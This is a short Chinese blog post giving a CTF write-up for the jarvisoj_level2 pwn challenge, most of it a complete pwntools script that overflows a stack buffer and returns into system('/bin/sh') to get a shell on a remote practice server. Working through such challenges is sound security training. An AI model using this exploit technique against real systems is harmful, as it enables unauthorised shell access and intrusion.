pwn | jarvisoj_level2

jarvisoj_level2

简单栈溢出rop ret2text
存在system和binsh字符串

直接丢exp:

from pwn import *

context.log_level = 'debug'

# sh = process('./level2')
sh = remote('node4.buuoj.cn', 29799)

p_binsh = 0x804a024
# p_system = 0x804849e
p_system = 0x8048320

sh.recv()

#                                   retaddr        retaddr2      argv0
payload = 0x88 * b'm' + 4 * b'z' + p32(p_system) + b'Mz11' + p32(p_binsh)

sh.sendline(payload)

sh.interactive()

sh.close()
posted @ 2021-11-17 18:49  Mz1  阅读(137)  评论(0编辑  收藏  举报